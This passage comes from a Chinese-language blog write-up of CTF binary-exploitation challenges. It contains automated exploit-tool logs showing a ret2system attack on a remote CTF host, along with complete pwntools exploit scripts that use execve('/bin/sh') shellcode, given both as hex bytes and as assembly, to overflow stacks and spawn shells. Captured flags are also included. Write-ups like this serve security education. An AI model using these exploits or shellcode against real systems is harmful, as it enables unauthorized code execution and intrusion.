&#91;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588] 100%&#91;*] &#91;09:44:10] <br>&#91;+] &#91;09:44:10] stack overflow detected! Padding: 32 bytes<br>&#91;*] &#91;09:44:10] performing assembly-based overflow analysis<br>&#91;+] &#91;09:44:10] stack size: 28 bytes<br>&#91;+] &#91;09:44:10] overflow padding adjustment: 32 bytes<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502              VULNERABLE FUNCTIONS IDENTIFIED               \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;+] &#91;09:44:10] vulnerable function: vuln<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                   ASSEMBLY CODE ANALYSIS                   
\u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] disassembling function: vuln<br>080491c1 &lt;vuln&gt;:<br> 80491c1:       push   ebp<br> 80491c2:       mov    ebp,esp<br> 80491c4:       push   ebx<br> 80491c5:       sub    esp,0x24<br> 80491c8:       call   80490d0 &lt;__x86.get_pc_thunk.bx&gt;<br> 80491cd:       add    ebx,0x2e27<br> 80491d3:       sub    esp,0xc<br> 80491d6:       lea    eax,&#91;ebx-0x1fe4]<br> 80491dc:       push   eax<br> 80491dd:       call   8049060 &lt;printf@plt&gt;<br> 80491e2:       add    esp,0x10<br> 80491e5:       sub    esp,0x4<br> 80491e8:       push   0x64<br> 80491ea:       lea    eax,&#91;ebp-0x1c]<br> 80491ed:       push   eax<br> 80491ee:       push   0x0<br> 80491f0:       call   8049050 &lt;read@plt&gt;<br> 80491f5:       add    esp,0x10<br> 80491f8:       nop<br> 80491f9:       mov    ebx,DWORD PTR &#91;ebp-0x4]<br>--<br> 804925a:       call   80491c1 &lt;vuln&gt;<br> 804925f:       mov    eax,0x0<br> 8049264:       lea    esp,&#91;ebp-0x8]<br> 8049267:       pop    ecx<br> 8049268:       pop    ebx<br> 8049269:       pop    ebp<br> 804926a:       lea    esp,&#91;ecx-0x4]<br> 804926d:       ret<br><br>0804926e &lt;__x86.get_pc_thunk.ax&gt;:<br> 804926e:       mov    eax,DWORD PTR &#91;esp]<br> 8049271:       ret<br><br>Disassembly of section .fini:<br><br>08049274 &lt;_fini&gt;:<br> 8049274:       push   ebx<br> 8049275:       sub    esp,0x8<br> 8049278:       call   80490d0 &lt;__x86.get_pc_thunk.bx&gt;<br> 804927d:       add    ebx,0x2d77<br> 8049283:       add    
esp,0x8<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                      STRING ANALYSIS                       \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] searching for \/bin\/sh string in binary<br>&#91;*] &#91;09:44:10] checking for \/bin\/sh string<br>&#91;+] &#91;09:44:10] \/bin\/sh string found in binary<br>&#91;*] &#91;09:44:10] testing for stack overflow vulnerability<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                  STACK OVERFLOW DETECTION                  \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] Testing overflow: 
&#91;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588] 100%&#91;*] &#91;09:44:10] <br>&#91;+] &#91;09:44:10] stack overflow detected! Padding: 32 bytes<br>&#91;*] &#91;09:44:10] performing assembly-based overflow analysis<br>&#91;+] &#91;09:44:10] stack size: 28 bytes<br>&#91;+] &#91;09:44:10] overflow padding adjustment: 32 bytes<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                     EXPLOITATION PHASE                     \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] initializing exploitation attempts<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502             REMOTE STACK OVERFLOW EXPLOITATION             
\u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] targeting remote service at ctf.ctbu.edu.cn:34196<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502           EXPLOITATION: ret2system - x32 Remote            \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;PAYLOAD] &#91;09:44:10] preparing ret2system exploit<br>&#91;*] &#91;09:44:10] system address: 0x8049070<br>&#91;*] &#91;09:44:10] \/bin\/sh address: 0x804a008<br>&#91;CRITICAL] &#91;09:44:10] EXPLOITATION SUCCESSFUL! 
Dropping to shell...<br>Encat flag<br>coctf{ret2flag_640a465c2af5}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">ret2shellcode<\/h3>\n\n\n\n<p>\u62ff\u5230\u9644\u4ef6<\/p>\n\n\n\n<p>\u517b\u6210\u4e60\u60ef\uff0c\u5148\u770b\u4fdd\u62a4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Arch:       amd64-64-little<br>RELRO:      Partial RELRO<br>Stack:      No canary found<br>NX:         NX enabled<br>PIE:        No PIE (0x400000)<br>Stripped:   No<\/code><\/pre>\n\n\n\n<p>64\u4f4d\u67b6\u6784\uff0c\u57fa\u672c\u4e0a\u6ca1\u6709\u4fdd\u62a4<\/p>\n\n\n\n<p>IDA\u6253\u5f00\uff0cmain\u51fd\u6570F5\u53cd\u7f16\u8bd1<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-25-1024x322.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"322\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-25-1024x322.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-679\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/figure>\n\n\n\n<p>\u524d\u9762\u4e09\u884c\u5f88\u666e\u901a\uff0c\u86ee\u5e38\u89c1\u7684\uff0c\u6682\u4e14\u5ffd\u7565<\/p>\n\n\n\n<p>\u540e\u9762\u7684\u51e0\u4e2a\u51fd\u6570\u8fd8\u662f\u86ee\u5e38\u89c4\u7684\uff0c\u552f\u4e00\u663e\u5f97\u6709\u70b9\u964c\u751f\u7684\u53ea\u4f1a\u662f\u8fd9\u4e2amprotect<\/p>\n\n\n\n<p>\u4e3a\u4ec0\u4e48\u4e0d\u641c\u4e00\u641c\u5462\uff08\u5b9e\u9645\u4e0a\u76f4\u63a5\u641c\u8fd9\u4e00\u884c\u7684\u5185\u5bb9\uff0c\u5c31\u80fd\u641c\u5230\u57fa\u672c\u4e0a\u5c0f\u6539\u52a8\u5c31\u80fd\u7528\u7684exp\uff0c\u6bcd\u9898wp\u53c2\u8003<a href=\"https:\/\/blog.csdn.net\/weixin_61995249\/article\/details\/130790592\">[HNCTF 2022 Week1]ret2shellcode-CSDN\u535a\u5ba2<\/a>\uff09<\/p>\n\n\n\n<p>\u5b9e\u5728\u4e0d\u884c\uff0c\u76f4\u63a5\u95eeai<\/p>\n\n\n\n<p>okabe\uff1amprotect((void *)((unsigned __int64)&amp;_bss_start &amp; 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7); \u4ec0\u4e48\u610f\u601d\uff1f<\/p>\n\n\n\n<p>AI\uff1a\u8fd9\u6761\u4ee3\u7801\u7684\u4f5c\u7528\u662f\uff1a\u5c06 <code>_bss<\/code> \u6bb5\u8d77\u59cb\u5730\u5740\u6240\u5728\u7684 <strong>4KB \u5185\u5b58\u9875<\/strong>\uff08\u5411\u4e0b\u5bf9\u9f50\u5230 4KB \u8fb9\u754c\uff09\u8bbe\u7f6e\u4e3a <strong>\u53ef\u8bfb\u3001\u53ef\u5199\u3001\u53ef\u6267\u884c<\/strong> \u6743\u9650<\/p>\n\n\n\n<p>\u53ef\u8bfb\u53ef\u5199\u53ef\u6267\u884c\uff0c\u662f\u4efb\u4f55\u7535\u8111\u64cd\u4f5c\u4e2d\u76f8\u5f53\u9ad8\u7684\u6743\u9650\u4e86<\/p>\n\n\n\n<p>\u800c\u5982\u679c\u4f60\u6ee1\u6000\u597d\u5947\u5fc3\u7684\u53cc\u51fb\u4e86buff<\/p>\n\n\n\n<p>\u6b38\uff1f\u4f60\u770b\u770b\u5b83\u653e\u7f6e\u5728\u54ea\u7684\u5462\uff1f<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-24-1024x143.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"143\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-24-1024x143.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-678\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0d\u5c31\u662fbss\u6bb5\u7684\u5417\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0cbuff\u91cc\u7684\u5185\u5bb9\uff0c\u5177\u6709\u53ef\u8bfb\u53ef\u5199\u53ef\u6267\u884c\u7684\u6743\u9650<\/p>\n\n\n\n<p>\u90a3\u4e48\u6211\u4eec\u60f3\u8981\u83b7\u53d6\u5230shell\u7684\u8bdd\uff0c\u4e5f\u53ea\u9700\u8981\u5f80buff\u5199\u5165\u80fd\u591f\u6253\u5f00shell\u7684\u5185\u5bb9\u5c31\u597d<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u5185\u5bb9\uff0c\u88ab\u6211\u4eec\u79f0\u4e4b\u4e3ashellcode<\/p>\n\n\n\n<p>\u7531\u4e8epwntools\u5df2\u7ecf\u4e3a\u6211\u4eec\u96c6\u6210\u4e86shellcode\u7684\u7f16\u5199\u64cd\u4f5c<\/p>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u53ea\u9700\u8981\u8c03\u7528\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u597d\u4e86\uff0c\u600e\u4e48\u63a7\u5236\u597d\u8bf4\uff0cshellcode\u77e5\u9053\u5f80\u54ea\u653e\u4e86\uff0c\u90a3\u600e\u4e48\u8ba9\u7a0b\u5e8f\u6d41\u8d70\u5230\u6211\u4eec\u653e\u7f6eshellcode\u7684\u4f4d\u7f6e\u5462\uff1f<\/p>\n\n\n\n<p>\u8fd8\u662f\u6808\u6ea2\u51fa\u642d\u914d\u8986\u76d6\u8fd4\u56de\u5730\u5740\u7684\u65b9\u6cd5<\/p>\n\n\n\n<p>\u6211\u4eec\u5728main\u51fd\u6570\u91cc\u80fd\u770b\u5230\u6570\u7ec4s\u7684\u957f\u5ea6\u662f256\uff0c\u800c\u67b6\u6784\u662f64\u4f4d\u7684\uff0c\u6240\u4ee5\u5bf9\u5e94\u586b\u5145\u7684\u5783\u573e\u6570\u636e\u662f\uff1a256+8\uff0c\u4e5f\u5c31\u662f0x100+0x8 = 
0x108<\/p>\n\n\n\n<p>\u8fd4\u56de\u5730\u5740\u5c31\u662fbuff\u7684\u5730\u5740<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br><br>context.arch = 'amd64'<br>context.log_level = 'debug'<br><br>r = process(\".\/attachment\")<br><br><br>buff_addr = 0x404080 <br><br>shellcode = asm(shellcraft.sh())        #\u5229\u7528pwntools\u751f\u6210shellcode<br># shellcode = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05'<br>ret = 0x0000000000401016<br><br><br>payload = shellcode.ljust(0x108, b'a') +p64(buff_addr)<br><br>r.sendline(payload)<br>r.interactive()<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u7ed9\u51fa\u4e86\u53e6\u5916\u4e00\u4e2a\u77edshell\u65b9\u6cd5\uff0c\u8fd9\u4e2a\u64cd\u4f5c\u5728\u4e0b\u9898\u91cc\u540c\u6837\u9002\u7528<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">shellcode_pro<\/h3>\n\n\n\n<p>\u8003\u70b9\uff1a\u8003\u5bdf\u9650\u5236\u957f\u5ea6\u7684shellcode<\/p>\n\n\n\n<p>\u4ea4\u4e92\u65f6\u7684\u4e2d\u6587\u5185\u5bb9\u867d\u7136\u6709\u70b9\u8c1c\u8bed\u4eba\u6027\u8d28<\/p>\n\n\n\n<p>\u4f46\u662f\u611f\u89c9\u8fd8\u662f\u5f88\u660e\u663e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ .\/attachment<br>\u516b\u5948\u89c1\u674f\u83dc\u6700\u8fd1\u611f\u89c9\u81ea\u5df1\u53c8\u7a7f\u4e0d\u4e0b\u4ee5\u524d\u7684\u8863\u670d\u4e86<br>\u5979\u5411\u6e29\u6c34\u8bc9\u82e6\uff0c\u6e29\u6c34\u770b\u4e86\u770b\u5979<br>\u6697\u6697\u60f3\u9053\uff0c\u201c\u6709\u7684\u8863\u670d\u53ea\u80fd\u7531\u5c0f\u66b4\u98df\u6d77\u736d\u7a7f\u4e0a\u5462\u201d<br>\u7136\u540e\u60f3\u4e86\u60f3\u600e\u4e48\u624d\u80fd\u4e0d\u8ba9\u8001\u516b\u7ee7\u7eed\u6298\u817e<br>\u56de\u9053\uff1a\u201c\u5e94\u8be5\u662f\u8863\u670d\u7f29\u6c34\u4e86\u5427\u201d<br>What's this : &#91;0x7ffd7dd1f4e0] ?<br>Maybe it's useful ! 
But how to use it?<\/code><\/pre>\n\n\n\n<p>\u60f3\u7684\u662f\u8863\u670d\u7f29\u6c34\u4e86\uff0c\u6697\u793ashellcode\u7684\u957f\u5ea6\u53d7\u5230\u4e86\u9650\u5236\uff0c\u53d8\u5c0f\u4e86<\/p>\n\n\n\n<p>\u601d\u8def\u8fd8\u662f\u7c7b\u4f3c\u7684\uff0c\u6808\u6ea2\u51fa\uff0c\u8986\u76d6\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n<p>\u552f\u4e00\u7684\u5dee\u522b\u5c31\u662fshellcode\u7684\u957f\u5ea6\u53d7\u9650\u4e86<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u9700\u8981\u9009\u624b\u81ea\u5df1\u901a\u8fc7\u641c\u7d22\u53bb\u627e\u77ed\u7684shellcode<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\uff0c\u610f\u8bc6\u5230\u4e86\u662fshellcode\u7684\u957f\u5ea6\u9650\u5236\u540e\uff0c\u5f88\u597d\u627e\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-23-1024x852.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"852\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-23-1024x852.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-677\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u768464\u4f4d\u77edshellcode\u5c31\u662f\u76f4\u63a5\u53ef\u7528\u7684<\/p>\n\n\n\n<p>exp\u91cc\u8fd8\u6709\u4e00\u4efd\u968f\u624b\u641c\u5230\u7684\u6c47\u7f16\u7ea7\u7684shellcode\uff0casm\u65b9\u6cd5\u5c31\u53ef\u7528\u4e86<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br><br>context(arch='amd64', 
os='linux' , log_level = 'debug')<br><br><br>p = remote(\"ctf.ctbu.edu.cn\", 32779)<br># \u542f\u52a8\u672c\u5730\u7a0b\u5e8f<br># p = process('.\/attachment')<br><br># \u63a5\u6536\u8f93\u51fa\u76f4\u5230\"What's this : &#91;\"\uff0c\u7136\u540e\u63d0\u53d6buf\u7684\u5730\u5740<br>p.recvuntil(\"What's this : &#91;\")<br>buf_addr_str = p.recvuntil(b']', drop=True)<br>buf_addr = eval(buf_addr_str)<br><br># \u8ba1\u7b97\u504f\u79fb\u91cf\uff1abuf\u5230\u8fd4\u56de\u5730\u5740\u7684\u8ddd\u79bb\u4e3a0x10\uff08buf\u5927\u5c0f\uff09 + 8\uff08\u4fdd\u5b58\u7684rbp\uff09 = 24\u5b57\u8282<br>offset = 24<br><br># 23\u5b57\u8282\u7684shellcode\uff0c\u7528\u4e8e\u6267\u884cexecve(\"\/bin\/sh\", 0, 0)<br># shellcode = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\xb0\\x3b\\x99\\x0f\\x05'<br><br>shellcode  = asm(\"\"\" xor \trsi,\trsi\t\t\t<br>push\trsi\t\t\t\t<br>mov \trdi,\t0x68732f2f6e69622f\t <br>push\trdi<br>push\trsp\t\t<br>pop\trdi\t\t\t\t<br>mov \tal,\t59\t\t\t<br>cdq\t\t\t\t\t<br>syscall   \"\"\")<br><br>#\u7f51\u4e0a\u968f\u624b\u641c\u7684\u77edshellcode<br><br># \u6784\u9020payload\uff1a\u586b\u5145\u5b57\u8282\u3001\u8fd4\u56de\u5730\u5740\uff08\u6307\u5411shellcode\u8d77\u59cb\u4f4d\u7f6e\uff09\u3001shellcode<br>payload = b'A' * offset + p64(buf_addr + offset + 8) + shellcode<br><br># \u53d1\u9001payload<br>p.send(payload)<br><br># \u5207\u6362\u5230\u4ea4\u4e92\u6a21\u5f0f<br>p.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">pie\u5b66\u957f\u4e0e\u5b66\u59b9\u4e0d\u5f97\u4e0d\u8bf4\u7684\u4e8c\u4e09\u4e8b<\/h3>\n\n\n\n<p>\u9898\u76ee\u540d\u79f0\u53ebpie\uff0c\u8003\u70b9\u662f\u5565\u5e94\u8be5\u5f88\u660e\u6670\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-22.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"965\" height=\"343\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-676\"  sizes=\"auto, (max-width: 965px) 100vw, 965px\" \/><\/div><\/figure>\n\n\n\n<p>out\u51fd\u6570\u662f\u51fa\u9898\u4eba\u8111\u5b50\u62bd\u4e86\u5199\u7684\u4e0d\u91cd\u8981\u7684\u6587\u5b57\u5185\u5bb9<\/p>\n\n\n\n<p>\u4e0d\u8fc7\u8fd8\u662f\u63d0\u5230\u4e86\u6709\u4ec0\u4e48\u4e1c\u897f\u6ca1\u53d8<\/p>\n\n\n\n<p>\u5982\u679c\u9009\u624b\u6709\u53bb\u641c\u7d22pie\u4fdd\u62a4<\/p>\n\n\n\n<p>\u53bb\u4e86\u89e3pie\u4fdd\u62a4\u540e\uff0c\u5c31\u77e5\u9053<\/p>\n\n\n\n<p>PIE\u5168\u79f0\u662fposition-independent 
